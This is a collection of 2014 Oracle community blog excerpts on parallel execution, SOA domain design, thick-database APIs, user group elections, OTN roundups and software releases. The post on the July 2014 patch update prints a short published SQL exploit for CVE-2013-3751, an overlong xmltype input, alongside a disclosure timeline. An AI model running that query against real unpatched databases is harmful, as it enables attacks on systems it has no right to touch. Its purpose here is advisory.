  l_sql_stmt := q'{begin sid_data_pkg.sid_ipt ('REMOTE_PX_TEST','ME_DBA','DT','D1',:start_id,:end_id); end;}';
  --
  DBMS_PARALLEL_EXECUTE.RUN_TASK(l_task, l_sql_stmt, DBMS_SQL.NATIVE,parallel_level => 16);
  --
  dbms_output.put_line(DBMS_PARALLEL_EXECUTE.TASK_STATUS(l_task));
  --
end;
/

This executed in 2 minutes and returned code 6 which is FINISHED (without error).

Status of individual chunks can be checked via DBA_PARALLEL_EXECUTE_CHUNKS.


Oracle 12C - In-Memory Option Resources

Karl Reitschuster - Wed, 2014-08-20 23:17

Hi folks,

Introduced as an Option Oracles In-Memory option will change the world of databasing also like SAP HANA does; Since July the release is out but the search for resources and documentation is  poor;

Here some useful links I found.

First the Home of Oracle In-Memory

Slicing the EDG

Antony Reynolds - Tue, 2014-08-19 20:24
Different SOA Domain Configurations

In this blog entry I would like to introduce three different configurations for a SOA environment.  I have omitted load balancers and OTD/OHS as they introduce a whole new round of discussion.  For each possible deployment architecture I have identified some of the advantages.

Super Domain

This is a single EDG style domain for everything needed for SOA/OSB.   It extends the standard EDG slightly but otherwise assumes a single “super” domain.

This is basically the SOA EDG.  I have broken out JMS servers and Coherence servers to improve scalability and reduce dependencies. Key Points

  • Separate JMS allows those servers to be kept up separately from rest of SOA Domain, allowing JMS clients to post messages even if rest of domain is unavailable.
  • JMS servers are only used to host application specific JMS destinations, SOA/OSB JMS destinations remain in relevant SOA/OSB managed servers.
  • Separate Coherence servers allow OSB cache to be offloaded from OSB servers.
  • Use of Coherence by other components as a shared infrastructure data grid service.
  • Coherence cluster may be managed by WLS but more likely run as a standalone Coherence cluster.
Benefits
  • Single Administration Point (1 Admin Server)
  • Closely follows EDG with addition of application specific JMS servers and standalone Coherence servers for OSB caching and application specific caches.
  • Coherence grid can be scaled independent of OSB/SOA.
  • JMS queues provide for inter-application communication.
Drawbacks
  • Patching is an all or nothing affair.
  • Startup time for SOA may be slow if large number of composites deployed.
Multiple Domains

This extends the EDG into multiple domains, allowing separate management and update of these domains.  I see this type of configuration quite often with customers, although some don't have OWSM, others don't have separate Coherence etc.

SOA & BAM are kept in the same domain as little benefit is obtained by separating them. Key Points

  • Separate JMS allows those servers to be kept up separately from rest of SOA Domain, allowing JMS clients to post messages even if other domains are unavailable.
  • JMS servers are only used to host application specific JMS destinations, SOA/OSB JMS destinations remain in relevant SOA/OSB managed servers.
  • Separate Coherence servers allow OSB cache to be offloaded from OSB servers.
  • Use of Coherence by other components as a shared infrastructure data grid service.
  • Coherence cluster may be managed by WLS but more likely run as a standalone Coherence cluster.
Benefits
  • Follows EDG but in separate domains and with addition of application specific JMS servers and standalone Coherence servers for OSB caching and application specific caches.
  • Coherence grid can be scaled independent of OSB/SOA.
  • JMS queues provide for inter-application communication.
  • Patch lifecycle of OSB/SOA/JMS are no longer lock stepped.
  • JMS may be kept running independently of other domains allowing applications to insert messages fro later consumption by SOA/OSB.
  • OSB may be kept running independent of other domains, allowing service virtualization to continue independent of other domains availability.
  • All domains use same OWSM policy store (MDS-WSM).
Drawbacks
  • Multiple domains to manage and configure.
  • Multiple Admin servers (single view requires use of Grid Control)
  • Multiple Admin servers/WSM clusters waste resources.
  • Additional homes needed to enjoy benefits of separate patching.
  • Cross domain trust needs setting up to simplify cross domain interactions.
  • Startup time for SOA may be slow if large number of composites deployed.
Shared Service Environment

This model extends the previous multiple domain arrangement to provide a true shared service environment.

This extends the previous model by allowing multiple additional SOA domains and/or other domains to take advantage of the shared services.  Only one non-shared domain is shown, but there could be multiple, allowing groups of applications to share patching independent of other application groups. Key Points

  • Separate JMS allows those servers to be kept up separately from rest of SOA Domain, allowing JMS clients to post messages even if other domains are unavailable.
  • JMS servers are only used to host application specific JMS destinations, SOA/OSB JMS destinations remain in relevant SOA/OSB managed servers.
  • Separate Coherence servers allow OSB cache to be offloaded from OSB servers.
  • Use of Coherence by other components as a shared infrastructure data grid service
  • Coherence cluster may be managed by WLS but more likely run as a standalone Coherence cluster.
  • Shared SOA Domain hosts
    • Human Workflow Tasks
    • BAM
    • Common "utility" composites
  • Single OSB domain provides "Enterprise Service Bus"
  • All domains use same OWSM policy store (MDS-WSM)
Benefits
  • Follows EDG but in separate domains and with addition of application specific JMS servers and standalone Coherence servers for OSB caching and application specific caches.
  • Coherence grid can be scaled independent of OSB/SOA.
  • JMS queues provide for inter-application communication.
  • Patch lifecycle of OSB/SOA/JMS are no longer lock stepped.
  • JMS may be kept running independently of other domains allowing applications to insert messages fro later consumption by SOA/OSB.
  • OSB may be kept running independent of other domains, allowing service virtualization to continue independent of other domains availability.
  • All domains use same OWSM policy store (MDS-WSM).
  • Supports large numbers of deployed composites in multiple domains.
  • Single URL for Human Workflow end users.
  • Single URL for BAM end users.
Drawbacks
  • Multiple domains to manage and configure.
  • Multiple Admin servers (single view requires use of Grid Control)
  • Multiple Admin servers/WSM clusters waste resources.
  • Additional homes needed to enjoy benefits of separate patching.
  • Cross domain trust needs setting up to simplify cross domain interactions.
  • Human Workflow needs to be specially configured to point to shared services domain.
Summary

The alternatives in this blog allow for patching to have different impacts, depending on the model chosen.  Each organization must decide the tradeoffs for itself.  One extreme is to go for the shared services model and have one domain per SOA application.  This requires a lot of administration of the multiple domains.  The other extreme is to have a single super domain.  This makes the entire enterprise susceptible to an outage at the same time due to patching or other domain level changes.  Hopefully this blog will help your organization choose the right model for you.

★ Database as a Storage (DBaaS) vs. Thick Database

Eddie Awad - Mon, 2014-08-18 08:30

A recent addition to my Oracle PL/SQL library is the book Oracle PL/SQL Performance Tuning Tips & Techniques by Michael Rosenblum and Dr. Paul Dorsey.

I agree with Steven Feuerstein’s review that “if you write PL/SQL or are responsible for tuning the PL/SQL code written by someone else, this book will give you a broader, deeper set of tools with which to achieve PL/SQL success”.

In the foreword of the book, Bryn Llewellyn writes:

The database module should be exposed by a PL/SQL API. And the details of the names and structures of the tables, and the SQL that manipulates them, should be securely hidden from the application server module. This paradigm is sometimes known as “thick database.” It sets the context for the discussion of when to use SQL and when to use PL/SQL. The only kind of SQL statement that the application server may issue is a PL/SQL anonymous block that invokes one of the API’s subprograms.

I subscribe to the thick database paradigm. The implementation details of how a transaction is processed and where the data is stored in the database should be hidden behind PL/SQL APIs. Java developers do not have to know how the data is manipulated or the tables where the data is persisted, they just have to call the API.

However, like Bryn, I have seen many projects where all calls to the database are implemented as SQL statements that directly manipulate the application’s database tables. The manipulation is usually done via an ORM framework such as Hibernate.

In the book, the authors share a particularly bad example of this design. A single request from a client machine generated 60,000 round-trips from the application server to the database. They explain the reason behind this large number:

Java developers who think of the database as nothing more than a place to store persistent copies of their classes use Getters and Setters to retrieve and/or update individual attributes of objects. This type of development can generate a round-trip for every attribute of every object in the database. This means that inserting a row into a table with 100 columns results in a single INSERT followed by 99 UPDATE statements. Retrieving this record from the database then requires 100 independent queries. In the application server.

Wow! That’s bad. Multiply this by a 100 concurrent requests and users will start complaining about a “slow database”. NoSQL to the rescue!

© Eddie Awad's Blog, 2014. | Permalink | 2 comments | Topic: Oracle | Tags: , ,

Related articles:

UKOUG 2014 Elections

Doug Burns - Sat, 2014-08-16 18:18
I noticed from Debra Lilley's blog post that there are some UKOUG elections at the moment, with voting closing on 1st September 2014.

Although not an active member or supporter of UKOUG any more (at least partly because I'm based in Singapore!), I've had a pretty long association with the user group and a lot of my friends have been involved over the years, so I still take an interest in what's going on there. Even more so this time, because I know two of the candidates pretty well.

Carl Dudley needs no introduction to anyone who has been remotely close to the UK or European OUG scene down the years and is an old mate who has put in a world of time to UKOUG over the years and, as a techie, has always tried to ensure that it remains relevant to all areas of the membership.

Pauline Drummond, on the other hand, will be largely unknown to most of the OUG community as I think she's only been attending events over the past few years. (I maybe be wrong about that as my memory isn't what it was for some reason ;-)) I know Pauline pretty well, though, as she was a manager at Standard Life when I worked there on contracts for several years before moving down to London, including being my direct manager for the last contract there. President Elect seems a pretty senior role within UKOUG but if Pauline applies the same boundless energy and enthusiasm that she always did in the office then I can see her being great at it. She makes me tired just thinking about all of the volunteering and organisation and sport and work stuff she gets through and is very dedicated and focussed to working with others to get things done, which strikes me as just what you need from a president of a user group.

For a change it's not one of my techie mates I'm suggesting would be good for the role of President because it is a role that needs to respect and appeal to the entire membership and the other entities that UKOUG has to deal with, not least Oracle, so you need someone with a broad corporate view. Pauline is an appropriate choice in this case, although I can't help hoping that she doesn't antagonise potential conference presenters as UKOUG seems to have done over recent times!

Regardless, I always hope for the best for UKOUG and my various mates who put a power of work into their volunteering and presenting roles, so hopefully some new voices will be a step in the right direction ....

Best of OTN - Week of August 10th

OTN TechBlog - Fri, 2014-08-15 11:12

Brief public service announcement before we get into the OTN community best of content for the week.... Four Bands. Three Epic Nights. Join Oracle for three evenings of entertainment and fun, all during Oracle OpenWorld and JavaOne, September 28-October 2, San Francisco. Learn More

Architect Community

Any discussion of the best of OTN must include the OTN ArchBeat Podcast. Consistently among the top 3 most popular Oracle podcasts, Archbeat focuses on real conversations with community members. Normally I pick the topics and the guest panelists for each program, but now you have a chance to take over that role and become a Guest Producer. In that role you'll pick the discussion topic and the panelists, while I do the all of the grunt work, allowing you to bask in the glory

Want to know how to become an OTN ArchBeat Podcast Guest Producer? You'll find the details here: Yes, you can take over the OTN ArchBeat Podcast!

And here are two examples of OTN ArchBeat Podcasts produced by community members:

-- OTN Architect Community Manager Bob Rhubart

Database Community

OTN DBA/DEV Watercooler Blog - Did You Say "JSON Support" in Oracle 12.1.0.2?.

-- OTN Database Community Manager Laura Ramsey

Java Community

The Java Source Blog - walkmod : A Tool to Apply Coding Conventions .

Friday Funny: I was worried the #NSA might be spying on me Thanks, @pacohope.

-- OTN Java Community Manager Tori Weildt

Systems Community

The OTN Systems Community HomePage- Find Great Resources for System Admins and Developers.

-- OTN Systems Community Manager Rick Ramsey

How to beat workday blues?

Vattekkat Babu - Fri, 2014-08-15 06:37

Let us face it - all of us feel like having achieved or done very little after spending a long day away from family. Then you look back and find that you could've spent some of that time with family at least!

I've been observing my work habits a lot and I think I have found out something that works for me.

I am summarizing these as a NOT-TODO list of 3 items. I am a software engineer by profession and by passion.

Has this worked for me? Absolutely much better than when I was not following these rules.

UnifiedPush Server: Docker, WildFly and another Beta release!

Matthias Wessendorf - Fri, 2014-08-15 04:07

Today we are announcing the second beta release of our 1.0.0 version. This release contains several improvements

  • WildFly 8.x support
  • PostgreSQL fix
  • Scheduler component for deleting analytics older than 30 days
  • Improvements on the AdminUI
  • Documentation

The complete list of included items are avialble on our JIRA instance

With the release of the server we also released new versions of the senders for Java and Node.js!

Docker

The team is extremely excited about the work that Docktor Bruno Oliveira did on our new Docker images:

Check them out!

Documentation

As mentioned above, the documentation for the UnifiedPush Server has been reorganized, including an all new guide on how to use the UnifiedPush Server.

Demos

To get easily started using the UnifiedPush Server we have a bunch of demos, supporting various client platforms:

  • Android
  • Apache Cordova (with jQuery and Angular/Ionic)
  • iOS

The simple HelloWorld examples are located here. Some more advanced examples, including a Picketlink secured JAX-RS application, as well as a Fabric8 based Proxy, are available here.

Docker

Bruno Oliveira did Docker images for the Quickstart as well:

Feedback

We hope you enjoy the bits and we do appreciate your feedback! Swing by on our mailing list! We are looking forward to hear from you!

NOTE: the Openshift online offering will be updated w/in the next day or two

Enjoy!


Best of OTN - Week of July 27th

OTN TechBlog - Fri, 2014-08-01 13:13
Systems Community - Rick Ramsey, OTN Systems Community Manager -

Tech Article -  Playing with ZFS Snapshots, by ACE Alexandre Borges -
Alexandre creates a ZFS pool, loads it with files, takes a snapshot, verifies that the snapshot worked, removes files from the pool, and finally reverts back to the snapshot file. Then he shows you how to work with snapshot streams. Great way to do backups

From OTN Garage FB - Recently a DBA at an IOUG event complained to Tales from the Data Center that they were unable to install from the Solaris 11.2 ISO. They had seen an Openstack a few weeks ago, and wanted to know how to install Solaris 11.2 in a VM. So guys… here is a step by step for you - Tales from the Datacenter.

Java Community - Tori Wieldt, OTN Java Community Manager

Tech Article: Learning Java Programming with BlueJ IDE https://blogs.oracle.com/java/entry/tech_article_learning_java_programming

The Java Source Blog - The Java Hub at JavaOne! Come see the Oracle Technology Network team and see cool demo's, interviews, etc.

Friday Funny : "An int and an int sometimes love each other very much and decide to make a long." @asz #jvmls Thanks @stuartmarks !

Database Community - Laura Ramsey, OTN Database Community Manager

OTN DBA/DEV Watercooler BlogOracle Database 12c Release 12.1.0.2 is Here! ..with the long awaited In-Memory option, plus 21 new features. Oracle Database 12c Release 12.1.0.2 supports Linux and Oracle Solaris (SPARC and x86 64 bit).  Read More!

Architect Community - Bob Rhubart, OTN Architect Community Manager
Top 3 Playlists on the OTN ArchBeat YouTube Channel

July Security Alert

Paul Wright - Thu, 2014-07-31 15:25
Hi Oracle Security Folks, The July Oracle Security Alert is out. My part is smaller than last quarter as just an In-Depth Credit, but Mr David Litchfield makes a triumphal return with some excellent new research. http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html There is a CVSS 9 and a remote unauthenticated issue in this patch so worth installing this one. [...]

Vamos to the OTN Latin America Tour!

OTN TechBlog - Wed, 2014-07-23 15:33

Rick Ramsey, OTN Systems Community Manager, just wrote a GREAT blog post about the upcoming OTN Latin America Tour! A brief excerpt is below - go to his blog post to see the full schedule and register for this series of events which kicks off August 2nd.

"Oracle User Groups in Latin America, our friends in the Oracle product teams, Oracle ACES, and the Oracle Technology Network have put together a terrific agenda for the 2014 Tour. Hands-on labs, demos, and presentations for developers and deployers of the technologies in the Oracle stack, from applications all the way to systems, including Oracle Database and trending topics such as Big Data. Presenters will be product experts drawn from the Oracle ACE Community and Oracle product teams."


Site Maintenance Complete!

Tim Hall - Sat, 2014-07-19 04:40

It looks like the site maintenance is complete and from my perspective the DNS changes have gone through.

If you go to the homepage and see a message called “Site Maintenance” in the “Site News” section, it means you are being directed to the new server. If you don’t see that it means you are still being directed to the old server and you won’t be able to read this. :)

I guess it will take a few hours for the DNS changes to propagate. Last time I moved the site it took a couple of days to complete for everyone.

Cheers

Tim…

Site Maintenance Complete! was first posted on July 19, 2014 at 11:40 am.
©2012 "The ORACLE-BASE Blog". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement.

Best Of OTN - Week of July 13th

OTN TechBlog - Fri, 2014-07-18 12:40
Systems Community- Blog - Get Your ZFS On
Five articles explaining how to use ZFS in the real world, by Oracle ACE Alexandre Borges.

Tech Article: Playing with ZFS Encryption -
Oracle Solaris 11 supports native encryption on ZFS so that it can protect critical data without depending on external programs. It's also integrated with the Cryptographic Framework. Alexandre explains the benefits of these and other Oracle Solaris encryption capabilities, and the different methods for encrypting and decrypting files, file systems, and pools.

Article - Building Bridges - Accept the existence of silos in large organizations, but build bridges between them and, incentives to use those bridges, by my colleague Bob Rhubart, manager of OTN's Architect Community.
Organizational silos thwarting IT architecture goals? Put away the sledgehammer.
Java Community- Blog - Oracle releases #JavaSE 8 Update 11 and Java SE 7 Update 65 - Developers can download the latest Java SE JDK and JRE the Oracle Technology Network.

Java Magazine: The July/August issue of Java Magazine explores the Java Virtual Machine (JVM), and includes a JavaOne preview.

RT @OracleAcademy: Where Are the #Women in Makerspaces? #WomeninSTEM #gendergap #tech - Read more here.

Database Community -

Hey Hey! Oracle has published it's Critical Patch Advisory for July 2014. Get it Here. Send to Your Friends!

Web Launch Replay- Oracle Big Data SQL - Bringing Structured Queries to an Unstructured World.  Oracle has just launched Oracle Big Data SQL.  


Pre-Built Developer VMs (for Oracle VM VirtualBox) -

Learning your way around a new software stack is challenging enough without having to spend multiple cycles on the install process. Instead, we have packaged such stacks into pre-built Oracle VM VirtualBox appliances that you can download, install, and experience as a single unit. Just downloaded/assemble the files, import into VirtualBox (available for free), import, and go (but not for production use or redistribution)!

Planned Maintenance This Weekend!

Tim Hall - Fri, 2014-07-18 02:14

Just a quick heads-up to you folks…

On Saturday I’ll be transferring my website and blog to a new server. It’s with the same hosting company, so hopefully the DNS changes will not be too drastic.

The site is already in place on the new box and it seems to be working fine, so on Saturday morning I will do a backup of the MySQL databases and transfer them to the new machine, then initiate the DNS change.

The last time I did this, which was between different hosting companies, there were some issues in some geographical regions for a couple of days, but most people were seeing the site as normal within about an hour.

Note. If you happen to post on the forum or comment on a blog post during Saturday, it might be lost depending on the timing. Also, my email address my go wonky for a little while…

Fingers crossed… :)

Cheers

Tim…

 

Planned Maintenance This Weekend! was first posted on July 18, 2014 at 9:14 am.
©2012 "The ORACLE-BASE Blog". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement.

Oracle CPU July 2014 + Oracle Exploit CVE-2013-3751

Alexander Kornbrust - Wed, 2014-07-16 10:03

Yesterday, Oracle released a new critical patch update (CPU Jul 2014) for July 2014. This CPU contains fixes for 5 database vulnerabilities. The most critical one, CVE-2013-3751, has a base score of 9.0 and affects Oracle 12.1 only. The same issue was already fixed for Oracle 11.2 in July 2013 (CPU Jul 2013).

After a short research on the web (google and twitter, less than 5 minutes) I found an exploit for the CVE-2013-3751.

This vulnerability was found by Nicolas Grégoire: He released an exploit nearly 1 year after the patch was published by Oracle. But it seems that he was not aware that Oracle forgot to fix this issue in Oracle 12.1

Timeline of CVE-2013-3751:

  • January 2012: Vulnerability found (fuzzing)
  • February 2012: Vulnerability reported to ZDI
  • March 2012: Vulnerability contracted $500
  • November 2012: Reported to Oracle by ZDI
  • July 2013: Patch published by Oracle
  • March 2014: Oracle’s Cloud still not patched
  • June 2014: Exploit released at INS#14 conference
  • July 2014: Patch for Oracle 12.1 published by Oracle

 

Exploit:

———-

select * from dual where xmltype(q'{<aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
abbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbcccccccccccccccccccccccccccccccccccccccccccccccc
ddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
ffffffffffffffffffffffffffffffffffffffffffffffffhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
iiiiiiiiiiiiiiiiiiiiiiiiii foo="bar[a &lt; b]"/>}') like '0wn3d_again';

———-

VirtualBox 4.3.14

Tim Hall - Wed, 2014-07-16 07:23

Oracle have given birth to VirtualBox 4.3.14. Mother and baby are doing well, with the downloads and changelog in the usual places.

Happy upgrading…

Cheers

Tim…

PS. Looks like the baby might be still-born. Fails pretty badly on Windows 7 at the moment…

PPS. Seems to work fine on Mac and Linux (Fedora 20)…

VirtualBox 4.3.14 was first posted on July 16, 2014 at 2:23 pm.
©2012 "The ORACLE-BASE Blog". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement.